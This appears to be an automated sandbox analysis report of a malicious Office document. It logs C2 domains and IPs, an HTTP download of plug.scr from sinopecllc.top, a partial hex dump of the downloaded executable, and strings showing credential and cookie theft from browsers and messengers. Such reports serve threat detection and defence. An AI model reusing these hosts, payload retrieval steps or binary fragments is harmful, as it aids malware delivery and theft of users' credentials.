                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
                  Source: global trafficTCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80

                  Networking

                  barindex
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: antfly50.sytes.net
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 80.85.154.121:1980
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 01 Jul 2024 11:58:01 GMTContent-Type: application/x-silverlightContent-Length: 1140744Connection: keep-aliveLast-Modified: Mon, 01 Jul 2024 02:59:13 GMTETag: "116808-61c26c839c3ba"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 17 1b 82 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 14 11 00 00 1c 00 00 00 00 00 00 9e 33 11 00 00 20 00 00 00 40 11 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 11 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 33 11 00 4f 00 00 00 00 40 11 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 32 11 00 08 36 00 00 00 60 11 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 13 11 00 00 20 00 00 00 14 11 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 dc 19 00 00 00 40 11 00 00 1a 00 00 00 16 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 11 00 00 02 00 00 00 30 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 33 11 00 00 00 00 00 48 00 00 00 02 00 05 00 e0 84 00 00 9c 5c 00 00 03 00 00 00 32 00 00 06 7c e1 00 00 d0 51 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5e 02 14 7d 01 00 00 04 02 28 18 00 00 0a 00 00 02 28 03 00 00 06 00 2a 13 30 02 00 2b 00 00 00 01 00 00 11 00 03 2c 0b 02 7b 01 00 00 04 14 fe 03 2b 01 16 0a 06 2c 0e 00 02 7b 01 00 00 04 6f 19 00 00 0a 00 00 02 03 28 1a 00 00 0a 00 2a 00 13 30 03 00 a3 01 00 00 02 00 00 11 00 d0 02 00 00 02 28 1b 00 00 0a 73 1c 00 00 0a 0a 02 73 1d 00 00 0a 7d 02 00 00 04 02 28 1e 00 00 0a 00 02 7b 02 00 00 04 16 6f 1f 00 00 0a 00 02 7b 02 00 00 04 28 20 00 00 0a 6f 21 00 00 0a 00 02 7b 02 00 00 04 19 6f 22 00 00 0a 00 02 7b 02 00 00 04 6f 23 00 00 0a 16 6f 24 00 00 0a 00 02 7b 02 00 00 04 6f 23 00 00 0a 28 20 00 00 0a 6f 25 00 00 0a 00 02 7b 02 00 00 04 16 6f 26 00 00 0a 00 02 7b 02 00 00 04 06 72 01 00 00 70 6f 27 00 00 0a 74 1f 00 00 01 6f 28 00 00 0a 00 02 7b 02 00 00 04 20 42 01 00 00 1f 36 73 29 00 00 0a 6f 2a 00 00 0a 00 02 7b 02 00 00 04 72 1f 00 00 70 6f 2b 00 00 0a 00 02 7b 02 00 00 04 20 3e 01 00 00 20 3f 01 00 00 73 2c 00 00 0a 6f 2d 00 00 0a 00
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                  Source: Joe Sandbox ViewASN Name: CHELYABINSK-SIGNAL-ASRU CHELYABINSK-SIGNAL-ASRU
                  Source: Joe Sandbox ViewASN Name: GLESYS-ASSE GLESYS-ASSE
                  Source: global trafficHTTP traffic detected: GET /plug.scr HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sinopecllc.topConnection: Keep-Alive
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,25_2_0041B380
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F5181AA1-4E9C-4A6F-AAB0-9D832B2C367F}.tmpJump to behavior
                  Source: global trafficHTTP traffic detected: GET /plug.scr HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sinopecllc.topConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
                  Source: plugman23456.scr, 00000017.00000002.388088314.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                  Source: plugman23456.scr, plugman23456.scr, 00000017.00000002.388088314.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                  Source: plugman23456.scrString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                  Source: plugman23456.scr, 00000015.00000002.392501517.00000000002CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                  Source: plugman23456.scr, 00000015.00000002.392501517.00000000002CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
                  Source: plugman23456.scr, 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                  Source: plugman23456.scr, 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: sinopecllc.top
                  Source: global trafficDNS traffic detected: DNS query: antfly50.sytes.net
                  Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://acdn.adnxs.com/ast/ast.js
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://b.scorecardresearch.com/beacon.js
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://cache.btrll.com/default/Pix-1x1.gif
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://cdn.at.atwola.com/_media/uac/msn.html
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://cdn.taboola.com/libtrc/msn-home-network/loader.js
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
                  Source: EQNEDT32.EXE, 00000002.00000002.363969598.000000000030F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.363803230.0000000000378000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.363811273.0000000000383000.00000004.00000020.00020000.00000000.sdmp, plug[1].scr.2.dr, znlzneAxBVd.exe.5.dr, plugman23456.scr.2.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                  Source: EQNEDT32.EXE, 00000002.00000002.363969598.000000000030F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.363803230.0000000000378000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.363811273.0000000000383000.00000004.00000020.00020000.00000000.sdmp, plug[1].scr.2.dr, znlzneAxBVd.exe.5.dr, plugman23456.scr.2.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
                  Source: plugman23456.scr, 0000000C.00000002.885917708.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, znlzneAxBVd.exeString found in binary or memory: http://geoplugin.net/json.gp
                  Source: plugman23456.scr, 00000005.00000002.378816554.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, znlzneAxBVd.exe, 00000019.00000002.395655089.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
